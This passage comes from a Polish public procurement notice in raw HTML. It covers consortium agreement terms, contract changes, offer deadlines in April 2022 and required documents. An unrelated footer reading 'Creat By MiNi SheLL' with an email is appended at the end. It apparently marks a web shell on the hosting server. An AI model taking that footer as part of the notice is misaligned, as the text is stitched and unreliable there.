poszczególni<br/>Wykonawcy. (Wzór stanowi Załącznik nr 6 do SWZ).<br/>25<br/>3. Wykonawcy wspólnie ubiegający się o niniejsze zamówienie, których oferta zostanie<br/>uznana za najkorzystniejszą na trzy (3) dni przed zawarciem umowy w sprawie zamówienia<br/>publicznego są zobowiązani przedstawić zamawiającemu stosowną umowę regulującą<br/>współpracę tych Wykonawców występujących wspólnie, zawierającą w swojej treści<br/>następujące postanowienia:<br/>3.1. określenie celu gospodarczego,<br/>3.2. oznaczenie czasu trwania konsorcjum, obejmującego okres realizacji przedmiotu<br/>zamówienia,<br/>3.3. podział zadań pomiędzy poszczególnych Wykonawców występujących wspólnie,<br/>zgodny z oświadczeniem, o którym mowa w pkt 2,<br/>3.4. wykluczenie możliwości wypowiedzenia umowy wspólnej przez któregokolwiek z<br/>Wykonawców występujących do czasu wykonania zamówienia w całości,<br/>3.5. solidarną odpowiedzialność Wykonawców występujących wspólnie za realizację<br/>przedmiotu zamówienia,<br/>3.6. solidarność Wykonawców jako wierzycieli względem wierzytelności, które będą im<br/>przysługiwały w związku z realizacją przedmiotu zamówienia w ramach zawartej z<br/>Zamawiającym Umowy,<br/>3.7. określenie sposobu płatności wynagrodzenia przez Zamawiającego przysługującego<br/>Wykonawcom w związku z realizacją zamówienia, zgodnie z którym faktury na rzecz<br/>Zamawiającego będzie wystawiał Lider, który będzie się rozliczał wewnętrznie z<br/>drugim członkiem konsorcjum. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> zgodnie z par. 14 wzoru umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-04-08 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na ePUAP i udostępnionego również na miniPortalu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-04-08 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> - Pełnomocnictwo (jeśli dotyczy);<br/>- Oświadczenia Wykonawców wspólnie składających ofertę w zakresie realizowanych przez nich<br/>zakresów przedmiotu umowy zgodnie z Działem XXIII SWZ (jeżeli dotyczy);<br/>-Oświadczenie (oświadczenia) z art. 125 ust. 1 ustawy Pzp;<br/>- Wykaz osób (Załącznik nr 5 do SWZ);<br/>- Zobowiązanie innego podmiotu (jeżeli dotyczy

Creat By MiNi SheLL
Email: jattceo@gmail.com